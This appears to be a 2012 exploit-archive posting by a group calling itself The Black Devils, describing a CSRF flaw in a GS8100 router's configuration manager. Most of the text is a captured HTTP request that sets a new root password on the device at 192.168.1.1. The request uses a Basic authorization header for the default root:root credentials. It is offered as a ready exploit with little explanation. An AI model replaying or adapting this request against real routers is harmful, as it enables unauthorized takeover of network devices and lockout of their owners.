facebook facebook twitter rss

GS8100 Configuration Manager GUI CSRF Vulnerability

Author: The Black Devils , Published: 29-09-2012
       db                                       88                          
d88b ""
d8'`8b
d8' `8b ,adPPYba, ,adPPYba, ,adPPYba, 88 8b,dPPYba, ,adPPYba,
d8YaaaaY8b I8[ "" a8P_____88 I8[ "" 88 88P' `"8a a8" "8a
d8""""""""8b `"Y8ba, 8PP""""""" `"Y8ba, 88 88 88 8b d8
d8' `8b aa ]8I "8b, ,aa aa ]8I 88 88 88 "8a, ,a8"
d8' `8b `"YbbdP"' `"Ybbd8"' `"YbbdP"' 88 88 88 `"YbbdP"'


# Exploit Title: GS8100 Configuration Manager GUI CSRF Vulnerability
# Author: The Black Devils
# HARDWARE Link:http://www.weifan.net/index.asp
# Date : 25/08/2012


open tamber data
--------------------------------
Host : 192.168.1.1
User-agent : Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language : fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-encoding : gzip, deflate
Connection : keep Alive
Referer : http://192.168.1.1/PopOutPage?id=40&ex_param1=root
cookie : sessionId=invalid
authorization : Basic cm9vdDpyb290
User : root
ex param01 : root
new_pass1 : [ New password ]
new_pass2 : [ New password ]
id : 3
Cmdsubmit : %CC%E1%BD%BB

-------------------------------

------------------------------------------------------
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios

Like us on Facebook :